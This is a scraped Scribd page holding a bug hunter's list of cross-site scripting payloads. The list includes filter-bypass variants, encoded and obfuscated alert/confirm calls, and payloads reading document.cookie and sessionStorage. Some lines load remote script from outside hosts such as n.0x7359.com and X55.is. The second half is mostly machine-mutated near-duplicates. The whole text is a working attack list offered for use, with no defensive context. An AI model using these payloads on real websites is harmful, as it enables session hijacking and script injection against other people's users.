Scribd
Upload
105 views67 pages

Payloads

Uploaded by

bughunt250
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
105 views67 pages

Payloads

Uploaded by

bughunt250
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 67

#<script>alert(1)</script>

1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
#javascript:alert(2);
"><svg onload=alert(1)>
[email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
[email protected]%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾 img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
<DIV+STYLE="background-image: url(javascript:alert(1))">
<IMG+DYNSRC="javascript:alert(1);">
IMG+LOWSRC="javascript:alert(1);">
<img+border=3+alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/*+*/oNcliCk=alert()
+)//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/
&lt;sVg/oNloAd=confirm('Hassan')//&gt;\x3e>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<!-- --!><script>alert(1)</script>
document[cookie]
<A HRef=//ibrahimxss.store AutoFocus %26%2362 OnFocus%0C=import(href)>
alert(cookie)
alert()
%61lert();
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<a%2Fonmouseover%3D(confirm)(document.URL)>a
<%73vg onlo%61d=%61lert('xss0r')>
<iframe src="javascript:alert(document.domain)"></iframe>
xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a)
{}else+if(a){/*///
/me/m%3C/script%3E%3Csvg/onload=prompt(document.domain)%3E
<isindex+type=image+src=1+onerror=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle
=&#x0000000000061;lert&#x000000028;origin&#x000029;>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E
<img src=x onerror="alert(origin)">
"><img/src=%20only=1%20OnErRor=x=alert`XSS`><!--
"><form+onformdata=window.confirm(document.cookie)><!--
logout.php?callback=<script>alert()</script>%0aTEST
sm"*alert(1)*"
javascript:parent[/al/.source+/ert/.source](document.domain)
callback=<script>alert()</script>%0aTESTž
javascript:alert('XSS')
1\/confirm?.(1)/\
1%27/confirm?.(1)/%27
"*alert(1)*"
1'/confirm?.(1)/'"
ibro"*alert(1)*"
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
"onclick=prompt(8)><svg/onload=prompt(8)>"
PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4=
alert?.(1)
<script>eval('al'+'ert(1)');</script>
“;alert(1)/
aaaa “;alert(1)/
<img src=x onerror=alert&#40document.domain&#41>
'alert(1)'.replace(/.+/,eval)
<img src/onerror=alert(1)>
#'%22/onmouseover=alert(document.domain)//
onmouseover=alert(document.domain)//
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
1"*%2Fconf%0Cirm%0B(1)<%0C%2FScript%2F--%0C><%0CScript>%2F*
1"*/conf
irm#(1)<
/Script/--
><
Script>/*
test<img src=a onerror=window['alert'](window['document']['cookie']);>test
<img onfocus=alert(1) autofocus tabindex=1>
<p onfocus=alert(1) autofocus tabindex=1>
<form onfocus=alert(1) autofocus tabindex=1>
<svg onfocus=alert(1) autofocus tabindex=1>
<wbr onfocus=alert(1) autofocus tabindex=1>
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022<script>alert("ibro")</script>\
u0022\u003e
<hgroup onfocus=alert(1) autofocus tabindex=1>
<input onmouseover=alert(1)>
<ul onfocus=alert(1) autofocus tabindex=1>
<video onfocus=alert(1) autofocus tabindex=1>
<svg onload=alert&#0000000040document.cookie)>
<details/open/ontoggle=confirm('XSS')>
;'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle=(confirm)
(1)-->
<svg onload='new Function*["Y000!"].find(al\u0065rt)*'>
"><body/oNpagEshoW=(prompt)()>
"><body/oNpagEshoW=(prompt)(document.domain)>
"><script>alert('ibrahimxss')</script>
%2522%253e%253cscript%253ealert%2528%2527BUG XSS By Wildan!%2527%2529%253c
%252fscript%253e
"><input/onfocus=(confirm)(document.domain)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"><body/onfocus=(confirm)(document.domain)>
"><Body/oNpagEshoW=(prompt)(1)>
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a
title="</style><img src='#' onerror='alert(1)'>">
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a
title="</textarea><img src='#' onerror='alert(1)'>">
img src='#' onerror='alert(1)'>">
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%22%3E%3Csvg%2Fonload=confirm(document.cookie)%3E
<mark onfocus=alert(1) autofocus tabindex=1>
<h1 onfocus=alert(1) autofocus tabindex=1>
<xss onfocus=alert(1) autofocus tabindex=1>
<body onhashchange="print()">
<plaintext onfocus=alert(1) autofocus tabindex=1>
<video controls src=1 onfocus=alert(1) autofocus>
xss0r\"-alert(1)}//
<video src="#" controls
onwebkitplaybacktargetavailabilitychanged="alert(1)"></video>

&𝐥𝐭;𝐢𝐦𝐠<> 𝐬𝐑𝐂=𝐱 𝐎𝐧𝐄<>𝐫𝐫𝐎𝐫=𝐚𝐥<>𝐞𝐫𝐭(1)>


<svg><image href=1 onerror=alert(1)>

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


<audio src/onerror=alert(1)>
<ol onfocus=alert(1) autofocus tabindex=1>
<image2 onfocus=alert(1) autofocus tabindex=1>
alert(document['cookie'])
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
"><img src=x onafterprint=prompt(document.domain);>
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<video onloadstart=alert()><source></*>
<xss draggable="true" ondragexit-alert()>test</xss>
(A(%22onerror='alert%60123%60'test))/
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"><form onformdata=window.confirm(document.cookie)><!--
a'-alert(1)//
'/alert(1)//
';document.addEventListener('DOMContentLoaded', function(){var c = function()
{a();};var s = document.createElement('script');s.src =
'https://n.0x7359.com/xss.js';s.onreadystatechange =
c;document.body.appendChild(s);});//
';alert(document.cookie)//
<svg/onload=alert/*1337*/(1)>
<svg/onload=alert//&NewLine;(2)>
<svg/onload=alert&sol;**&sol;(3)>
&lt;script>alert(document.cookie)&lt;/script>
<svg/onload=alert/&#42;&#42;/(4)>
<svg/onload=alert&#x2F;**&#47;(5)>
'-confirm?.(1);function+myObj(){}'
"' OnError=(confirm)(1) <!--><Img Src='
#Data:,<Img/Src/OnError=(confirm)(1)>
}/confirm?.(1)//%5C
"'<!--><Img/Src/OnError=(confirm)(1)>"[email protected]
%27)/confirm?.(1);function+myObj(){};function+atob(){confirm?.(1)}//
<Script /Src=https://X55.is?1=18369></Script>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?
1=18369/.source))//>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</
Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*$
{/*/;{/**/(confirm)(1)}//><Base/Href=//X55.is\76-->
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</
Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*$
{/*/;{/**/(import(/https:\\X55.is?1=18369/.source))}//\76-->
confirm?.(1)
ignition/scripts/--><svg%20onload=alert%28document.domain%29>
<svg%20onload=alert%28document.domain%29>
<script ~~~>alert(0%0)</script ~~~>
"ontouchend%3Dprompt%281%29+class%3Dd3rk+
`'%3balert(String.fromCharCode(88,83,83))%2f
%2f'%3balert(String.fromCharCode(88,83,83))%2f
%2f"%3balert(String.fromCharCode(88,83,83))%2f
%2f"%3balert(String.fromCharCode(88,83,83))%2f%2f--
"><svg onScroll="javascript:alert(1)//
<x \'=\"foo\"><x foo=\'><img src=x onerror=javascript:alert(1)//\'>
\">%0D%0A%0D%0A<x \'=\"foo\"><x foo=\'><img src=x
onerror=javascript:alert(`cloudfrontbypass`)//\'>
`\"\'><img src=\'#\\x27 onerror=javascript:alert(1)>
<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>alert(1)</script>\">
<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(91)</script>\">
"<!--><Svg OnLoad=confirm?.(/d3rk😈/)<!--1")"<!--><Svg+OnLoad=confirm?.(/d3rk
😈/)<!--
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--
%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
url=%26%2302java%26%23115cript:alert(document.domain)
%26%2302java%26%23115cript:alert(document.domain)
">>>>>><marquee>RXSS</marquee></head><abc%3E</
script><script>alert(document.cookie)</script><meta
“><iMg SrC=x onError=prompt()>
\" onload=prompt(1)>
<a/href=\"j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s]
(e+s+v+h+n)(/infected/.source)\
<sVg OnPointerEnter=\"location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div\"> \n
<svg onload\\r\\n=$.globalEval(\"al\"+\"ert()\");>\n
<details/open/ontoggle=\"self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']
['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];\">
"><script>prompt()</script>
<Svg On Only=1 Onload=alert("hex")>
"><script>alert(document.cookie)</script>
<<script>script>prompt()</script>
<svg/onload=prompt()>
<Svg On Only=1 Onload=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open
ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
<!</textarea <body onload='alert(1)'>
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
</script><script>alert(9)</script>
</script ><script>alert(9)</script><script>
themecolor=%22-alert('XSS')-%22
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
#'%26%26'javascript:alert%25281%2529//
</a onmousemove="alert(1)">
<svg onload=alert (1337)&nvgt;
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al+/e/[`ex + `ec`]`e`+`rt`](2)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
<iframe src-doc="<svg onload=alert (1337)&nvgt;"></iframe>
m3ez<Svg Only=1 OnLoad=prompt("Path\x20Injection\x20Reflected\x20XSS:","Supakiad\
x205.\x20(m3ez)")>
m3ez%3cSvg%20Only%3d1%20OnLoad%3dprompt("Path\x20Injection\x20Reflected\
x20XSS:","Supakiad\x205.\x20(m3ez)")%3e
m3ez%253cSvg%2520Only%253d1%2520OnLoad%253dprompt("Path%5cx20Injection
%5cx20Reflected%5cx20XSS:", "Supakiad%5cx205.%5cx20(m3ez)")%253e
6'%22()%26%25%22%3E%3Csvg/onload=prompt(document.domain)%3E/
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')
(Reflect.get(document,'coo'+'kie'))">
\’/alert(1)//
‘; alert(1);
‘|alert(1)|’
‘}};alert(1);{{‘
‘}alert(1);{‘
“-alert(1)-”
“}]}’;alert(1);{{‘
alert\\`1\\`
‘-alert(1)-’
('+alert(1)+');;;;();
('+alert(1)////)+')();
'+alert(1)'+;;;;()
////('+alert(1)+')();;;;;
'////;+alert(1)+;;;;()
(';+alert(1)+)::();
("+alert(1)+')()
////('+alert(1)+');;;;()
('+alert(1)+')+;;;;;;
'+alert(1)+')'::::()
(';++++alert(1)////())
('++alert(1)\\\\()
(';alert(1)'+;;;;()
//(';alert(1)+);;;;;()
(';;;;alert(1)()+);;;;;
';alert(1)//()+;;;;
(;alert(1);;;);()
';;;;alert(1)+'()
('alert(1);;;;;)+()
(';;;;alert(1)////)()
.alert(1);;;;;
//.alert(1);;;;;
.;alert(1)////;
::::.alert(1)();;;;;
.alert////(1)////;
.;;;;alert(1);;;;;
\\.;alert(1);;;;;
.alert(1);;;;
.;alert(1)();;;;;
.alert(1)::::;;;;
;;;;;.alert(1);;;;
;;;;.alert(1)()
////;.alert(1);;;;;
\\.;alert(1)////
.alert(1)';;;;;
;;;;alert(1)';;;;;
.;;;;alert(1);;;;;()
.alert(1);;;;;;
.alert;;;;(1)();
.alert(1);:::;;;;
\'-alert(1);;;;////
\'-alert(1):://
\'-;;;;alert(1)////
\\'-alert(1)////;;;;
\'-alert;;;;(1)////
\'-alert(1)//;;;;;;
\'-;;;;alert(1)\\////
\'-alert(1)//\\;;;;;
;;;;\'-alert(1)////
\'-alert(1);;;;;//
\'-alert////(1)////
\'-alert////;;;;(1)//
\'-alert(1);;;;;
\'-alert(1)::;:://
\'-alert(1)//;;;;
\'alert(1)//;;;;;
\\\\\'-alert(1)//;;
\'--alert(1)////;;;;
\'alert;;;;(1);;;;
#\'-alert(1)//;;;;
#\'-alert(1);;;;//
#\';;;;alert(1)////
\\\\#\'-alert(1)//;;;;
#\'-;;;;alert(1)//
#\'-alert(1)//;;;;;;
#\'-alert;;;;(1)////
#\'-alert(1)//;;;;;;;
#\'alert(1)////;;;;
#\'alert(1)//;;;;;;;
#\'-alert(1)////;;;;
#\'alert////(1)//;;;;
#\'-;;;;alert(1)//;;;;
#\'alert(1)//;;;
#\'-alert(1);;;;;
#\'-alert(1)//::::
#\'alert(1);;;;;
#\'-alert(1)////;;;;;;
'};;;;alert(1);;;;;{'
'};;;;alert(1);;;;;;;;{'
'};;;;alert(1){{;;;;
'};;;;alert(1);;;{{}
'};;;alert;;;;(1);{{}
'};;;;alert////(1);;;{
'};;;;alert////(1);;;;;{
'};;alert(1);;;;;;;{
'};;alert////(1){;;;;}
';;;;;alert(1){};;;;
'};;;alert(1);;;;{
';;;;alert(1);;;;;{;;;;}
'};;;alert;;;;(1);;;{
'};;;;alert(1);;;;;;;
';;;alert;;;;(1);{{;;
';;;alert;;;;(1){{}}
'};;;;alert(1);;;{}
'}alert(1);;;;{;;;;}
'};;;;alert(1);;;{{{
'};;;;;alert(1);{{}
#*/alert(1);;;;
#*/alert(1)////;
#*;;;;alert(1);;;;;
#*::::alert(1);;;;;
#*;;;;alert(1);;;;;;;
#*/;;;;alert(1);;;;;
#*/alert(1)();;;;;;;
#*/alert(1);;;;;////
#*/;;;;alert(1);;;;
#*/alert(1);;;;;;;
#*/alert(1);;;;::::
#*;;alert(1);;;;;;;
#*//alert(1);;;;;;;
#*/;;;;alert(1)();;;;;
#*alert(1)();;;;;;;
#*/alert(1);;;;::::;
#*/alert(1)::::;;;;
\"-alert(1)};;;;//
\"-;;;;alert(1)}//;;;;
\"-alert(1)}////;;;;;;
\"-;;;;alert(1)}////;;;;
\"-alert(1)}//;;;;;;;
\"-;;;;alert(1)}//;;
\"-alert(1)};;;;//;;
\"-alert(1)};;;;;;;////
\"-alert;;;;(1)}////;;;;
\"-alert(1)};:::////
\"-alert(1)};;;;:::://
\"-;;;;alert(1)}//;;;;;;
\"-alert(1)};;;;;;;
\"-alert;;;;(1)};;;;;;
\";;;;alert(1)}////;;
\"-alert;;;;(1)};;;;;
\"-alert(1)}////::::
\"-alert(1)};;;;;:::://
\"-alert;;;;(1)}//;;;;;
\";;;;alert(1)};;;;;;////
alert(document.cookie);;;;;
alert(document.cookie)////;;;;
alert;;;;(document.cookie)::::;;;;
;;;;alert(document.cookie)////
alert(document.cookie);;;;
alert////(document.cookie);;;;;
alert(document.cookie)::::;;
alert(document.cookie);;;;;;;;;
alert;;;;(document.cookie)////
;;;;alert////(document.cookie);;;;
alert(document.cookie);:::;;;;
alert;;;;document.cookie)::::;;
;;;;alert(document.cookie);;;;;;;
alert(document.cookie)////::::
alert;;;;(document.cookie);;;;
alert////(document.cookie);;;;;;;
alert(document.cookie)';;;;;;;
alert(document.cookie);;;;;;;
alert;;;;document.cookie)////;
alert(document.cookie);;;;;;;::::
‘);alert(‘done’);var b=(‘
‘);;;;;alert(‘done’);;;;;var b=(‘;;;;
‘);alert(‘done’);;;;;var b=(‘////;;;;
‘);;;;;alert(‘done’);var b;;;;=(‘::::;;;;
‘);alert;;;;(‘done’);;;;;var b=(‘;;;;;;
‘);;;;;alert(‘done’);;;;;var b;;;;=(‘
‘);;;;;alert;;;;(‘done’);var b=(‘;;;;
‘);alert;;;;(‘done’);;;;;var;;;;b=(‘;;;;
‘);alert(‘done’);;;;;;;;;var b;;;;=(‘;;;;
‘);;;;;alert(‘done’);;;;;var;;;;b=(‘;;;;;;
‘);alert;;;;(‘done’);;;;;var;;;;b=(‘////;;;;
‘);;;;;alert;;;;(‘done’);;;;;var;;;;b=(‘;;;;;;;
‘);alert;;;;(‘done’);var;;;;b;;;;=(‘;;;;
‘);;;;;alert(‘done’);;;;;var;;;;b;;;;=(‘;;;;;;
‘);alert(‘done’);;;;;;;;;var;;;;b;;;;=(‘;;;;
‘);;;;;alert;;;;(‘done’);;;;;var;;;;b;;;;=(‘;;;;
‘);alert;;;;(‘done’);;;;;;;var;;;;b;;;;=(‘;;;;;;
‘);alert(‘done’);;;;;;;var;;;;b;;;;=(‘////;;;;
‘);;;;;alert;;;;(‘done’);;;;;;;var;;;;b;;;;=(‘;;;;;;
‘);alert;;;;(‘done’);;;;;var;;;;b;;;;=(‘;;;;
');;;;;alert('Humal');;;;
');alert('Humal')////;;;;
';;;;;alert('Humal')////
');alert;;;;('Humal');;;;
');;;;;alert('Humal');;;;;
');alert('Humal');;;;;;;;
');alert('Humal');;;;;////
');;;;;alert('Humal')::::;;;;
');;;;;alert;;;;('Humal');;;;;
');;;;;alert('Humal')::::
');;;;;alert('Humal');;;;;;;
';;;;;alert('Humal');;;;;
');;;;;alert('Humal');;;;;;;;
');alert('Humal')////;
');alert;;;;('Humal');;;;;;;
');;;;;alert('Humal');;;;::::
\\";;;;alert('Humal');////
\\;;;;alert('Humal');;;;;//
\\;;;;alert('Humal');;;;;;;
\\\\;;;;alert('Humal');////
\\";;;;alert('Humal')////;;;;
\\";;;;alert('Humal');;;;;;;
\\"alert('Humal');;;;;//
\\\\;;;;alert('Humal');;;;;
\\\\alert('Humal');;;;;;;
\\";;;;alert('Humal')::::;;;;
\\;;;;alert('Humal');;;;;
\\";;;;alert('Humal');;;;////
\\;;;;alert('Humal');;;;;;
\\";;;;alert('Humal');;;;;;
\\\\alert('Humal')////;;;;
\\";;;;alert('Humal')////;;;;;;
\\";;;;alert('Humal');;;;::::
*/alert('HUMAL\n-HUMAL');;;;;////
*/alert('HUMAL\n-HUMAL');;;;;//;;;;
*/alert;;;;('HUMAL\n-HUMAL');;;;////
*/alert('HUMAL\n-HUMAL');;;;;//;;
*/;;;;alert('HUMAL\n-HUMAL');;;;;//
*/alert('HUMAL\n-HUMAL')////;
*/alert('HUMAL\n-HUMAL');;;;;;////
*/alert;;;;('HUMAL\n-HUMAL');;;;;
*/alert('HUMAL\n-HUMAL');;;;::::
*/;;;;alert('HUMAL\n-HUMAL');;;;;;
*/alert('HUMAL\n-HUMAL');;;;////
*/alert('HUMAL\n-HUMAL')::::;;;;
*/alert('HUMAL\n-HUMAL');;;;;;;;
*/alert('HUMAL\n-HUMAL');;;;;;;
*/alert('HUMAL\n-HUMAL');;;;;;
*/alert;;;;('HUMAL\n-HUMAL')////;;
*/alert('HUMAL\n-HUMAL')////::::
');;;;;alert('Humal');;;;;var x=';;;;
');alert('Humal');;;;;var x='////;;;;
');alert('Humal');;;;;var;;;;x=';;;;
');;;;;alert('Humal');;;;;var;;;;x=';;;;;;
');alert('Humal')::::var;;;;x=';;;;
');;;;;alert('Humal');;;;;var;;;;x=';;;;
');alert('Humal');;;;;;;var;;;;x=';;;;
');alert('Humal');;;;;;;;var;;;;x=';;;;;;
');alert;;;;('Humal');;;;;;;var;;;;x=';;;;;;
');;;;;alert('Humal');;;;;;;;var;;;;x=';;;;
');alert('Humal');;;;;;;;var;;;;x=';;;;
');alert;;;;('Humal');;;;;var;;;;x=';;;;
');alert;;;;('Humal');;;;;;;;var;;;;x=';;;;;;
');alert('Humal');;;;;var;;;;x='////;;;;
');alert('Humal')::::var;;;;x=';;;;;;
');alert('Humal');;;;;;;;var;;;;x=';;;;;;;
');;;;;alert('Humal');;;;;;;;var;;;;x=';;;;;;;
\\\\');alert(\'Humal\');;;;;var x=\'
\\');;;;;alert(\'Humal\');;;;;var;;;;x=\'
\\');alert(\'Humal\');;;;;var;;;;x=\'////;;;;
\\');alert\'Humal\';;;;;var;;;;x=\';;;;;;
\\\\');;;;;alert(\'Humal\');;;;;var;;;;x=\'
\\');alert\'Humal\'////;;;;var;;;;x=\';;;;
\\');alert\'Humal\';;;;;;var;;;;x=\'
\\');alert\'Humal\';;;;;;var;;;;x=\'////
\\\\');alert\'Humal\';;;;;;;;var;;;;x=\';;;;
\\\\');alert\'Humal\'////;;;;var;;;;x=\';;;;;
\\');alert\'Humal\';;;;;;;;var;;;;x=\'
\\');alert\'Humal\'::::var;;;;x=\';;;;;;
\\\\');alert\'Humal\';;;;;;;var;;;;x=\';;;;
\\');alert\'Humal\'////;var;;;;x=\';;;;
\\');alert\'Humal\';;;;;;;;var;;;;x=\';;;;;
\\\\');alert\'Humal\'////;;;;var;;;;x=\';;;;;;
\\');alert\'Humal\';;;;;;;var;;;;x=\'
\\\\');alert\'Humal\';;;;;;;;var;;;;x=\';;;;;;
/confirm(1)?.(1)//;;;;
/confirm(1)?;;;;.(1)//;;;;
/confirm(1)?.;;;;(1)////;;
/confirm;;;;(1)?.(1)//;;;;
/confirm(1)?.;;;;(1)//;;;;
/confirm(1)?.;;;;(1)////
/confirm(1)?;;;;.(1)////;;;;
/confirm;;;;(1)?;;;;.(1)////;;;;
/confirm(1)?::::.(1)////;;;;
/confirm(1)?.;;;;.(1)////
/confirm(1)?;;;;.(1)//;;;;;;
/confirm;;;;(1)?.;;;;(1)////
/confirm(1)?;;;;.(1)////;;
/confirm(1)?::::.(1)////;;
/confirm(1)?.(1)//;;;;;;
/confirm(1)?::::.(1)//;;;;
/confirm(1)?.;;;;(1)//;;;;;;;
/confirm?.(1)//;;;;
/confirm?.;;;;(1)////
/confirm?.;;;;(1)//;;;;
/confirm?.;;;;(1)//;;
/confirm?;;;;(1)////;;;;
/confirm?.(1)////;;;;
/confirm?::::.(1)////;;;;
/confirm?.(1)//;;;;;;
/confirm?.;;;;(1)//;;;;;;
/confirm?;;;;(1)//;;;;;;
/confirm?.;;;;(1)////;;;;
/confirm?.(1)//::::;;;;
/confirm?.(1)//;;;;;;;
/confirm?.(1)////;;;;;;
/confirm?.;;;;(1)////;;;;;;;
‘;;;;alert(123);;;;;t=’
‘alert(123);;;;;t=’
‘;;;;alert(123);;;;;t=’;;;;
‘alert;;;;(123);;;;;t=’;;;;
‘alert(123)::::t=’;;;;
‘;;;;alert(123);;;;;t=’;;;;;;
‘alert;;;;(123);;;;;t=’;;;;;;
‘;;;;alert(123)::::t=’;;;;;;
‘alert(123);;;;;t=’;;;;;;
‘alert(123)::::t=’;;;;;;;
‘alert(123);;;;;;;t=’
‘alert;;;;(123);;;;;t=’;;;;;;;
‘;;;;alert(123);;;;;t=’;;;;;;;
‘alert(123);;;;;t=’;;;;;;;
“;;;;alert(123);;;;;t=”
“alert(123);;;;;t=”;;;;
“;;;;alert(123);;;;;t=”;;;;
“alert;;;;(123);;;;;t=”;;;;
“alert(123)::::t=”;;;;;;
“;;;;alert(123);;;;;t=”;;;;;;
“alert(123);;;;;t=”;;;;;;
“;;;;alert(123)::::t=”;;;;;;
“alert(123)::::t=”;;;;;;;
“alert;;;;(123);;;;;t=”;;;;;;
“alert(123);;;;;t=”;;;;;;;
“alert;;;;(123);;;;;t=”;;;;;;;
“alert(123);;;;;;;t=”;;;;
‘>alert(154)</script>;;;;<script/154=’;;;;
‘>alert(154)</script><script////154=’;;;;
‘;;;;>alert(154)</script><script/154=’;;;;;;
‘>alert(154)::::</script><script/154=’;;;;;;
‘>alert(154)</script><script;;;;154=’;;;;;;
‘;;;;>alert(154)</script><script/154=’;;;;;;;
‘>alert(154)</script><script/154=’;;;;;;;
‘>alert(154)</script>;;;;<script/154=’;;;;;;
‘>alert;;;;(154)</script><script/154=’;;;;;;
‘>alert(154)::::</script><script/154=’;;;;;;;
‘>alert(154)</script>;;;;<script/154=’;;;;;;;
‘>alert(154)</script><script////154=’;;;;;;
‘;;;;>alert(154)</script><script/154=’;;;;
‘>alert(154)</script><script////154=’;;;;;;;
\\\\'-alert(1)//;;;;
\'-;;;;alert(1)//;;;;
\'-alert;;;;(1)//;;;;
\\\\'-alert(1)////
\'-alert(1)//::::;;;;
\'-alert(1)//;;;;;;;
\'-alert(1);;;;;//;;;;
\'-;;;;alert(1)//;;;;;;
\'-alert(1)//;;;;::::
\'-alert(1)////;;;;
\\\\'-alert(1)//;;;;;;
\'-alert;;;;(1)//;;;;;;
\'/alert(1)//;;;;
\'/alert(1);;;;;//
\\\\'/alert(1)//;;;;
\'/;;;;alert(1)//;;;;
\'/alert;;;;(1)//;;;;
\\\\'/alert(1)////
\'/alert(1)//;;;;;;
\'/alert(1)//::::;;;;
\'/alert(1)//;;;;;;;
\'/alert(1);;;;;//;;;;
\'/;;;;alert(1)//;;;;;;
\'/alert(1)//;;;;::::
\'/alert(1)////;;;;
\'/;;;;alert(1)////
\\\\'/alert(1)//;;;;;;
\'/alert;;;;(1)//;;;;;;
\'-alert(1)////
\'////-alert(1)////
\'////-alert(1)////;;;;
\\\'-alert(1)////
\\\\\'-alert(1)////
\\\'////-alert(1)////
\'-alert(1)////;;;;;;
\'\\\\-alert(1)////
\'////-alert(1)\\\\\\\\
\'\\\\\\\\-alert(1)\\\\\\\\
\'-alert(1)////\\\\
\\\'-alert(1);;;;;//;;;;
\\\'////-alert(1)\\\\\\\\;;;;
\'-alert(1)\\\\\\\\;;;;
\\\\\'-alert(1)////;;;;;;
\'////-alert(1);;;;////
\'-alert(1);;;;////\\\\\\\\
\'\\\\-alert(1)////;;;;
\'////alert(1)////
\'/alert(1)////
\'/alert(1)////\\\\
\\\'/alert(1)////
\\\\\'/alert(1)\\\\\\\\
\'/////alert(1)////
\'\\\\alert(1)////\\\\
\\\\\'/alert(1)////\\\\
\'/alert(1)\\\\\\\\;;;;
\'/////alert(1)////\\\\
\\\'/alert(1)\\\\\\\\;;;;;;
\\\'/alert(1)////;;;;;;
\'////alert(1)\\\\\\\\;;;;
\\\\\'/alert(1)////\\\\\\\\;;;;
\'/////alert(1)\\\\\\\\;;;;
\'/alert(1)////\\\\\\\\;;;;
\'/alert(1)\\\\\\\\////
\\\\\'/alert(1)////
\'}alert(1);{////
\\\'}alert(1);{////
\\\'}alert(1);{////\\\\
\'}alert(1);{////;;;;
\'}alert(1);{\\\\\\\\;;;;
\\\\\'}alert(1);{////
\\\\\'}alert(1);{////\\\\
\'}alert(1);{////;;;;;;
\'}alert(1);{\\\\\\\\;;;;;;
\\\\\'////alert(1);{////
\\\\\'alert(1);{\\\\\\\\;;;;
\'}alert(1);{////\\\\
\\\\\'////alert(1);{\\\\\\\\
\'}alert(1);{////\\\\\\\\
\\\\\'alert(1);{////
\'}alert(1);{\\\\\\\\////
\\\\\'////alert(1);{\\\\\\\\;;;;;;
\\\\\'alert(1);{////\\\\\\\\;;;;
"%5c"><body%2fonload%3d%26lt%3b!--%26gt%3b%26%2310confirm(1)%3bprompt(%2fXSS
%2f.source)>"%2c
<svG/x=">"/oNloaD=confirm()//
" onfocus="alert(1)" autofocus="
&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;
onpointerover=”alert(‘XSS’)
jAvaScripT:(alert)`1`
javascript:alert('1')
"onpointerover=”alert(‘XSS’)
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/
onload=prompt(document.domain)%20>
<img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
onclick=”alert(‘XSS’)
onmouseover=”alert(‘XSS’)
onload=”alert(‘XSS’)
onerror=”alert(‘XSS’)
onfocus=”alert(‘XSS’)
onblur=”alert(‘XSS’)
onchange=”alert(‘XSS’)
oninput=”alert(‘XSS’)
onsubmit=”alert(‘XSS’)
onkeydown=”alert(‘XSS’)
<img src=x:alert(alt) onerror=eval(src) alt=0>
new Proxy({}, { get: () => alert(1) }).test();
<img src=/ onerror=alert(1)>
3Cscript%3Ealert(1)%3C%2Fscript%3E##1
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
//";alert(String.fromCharCode(88,83,83))
<svg onload=prompt&#0000000040document.domain)>"
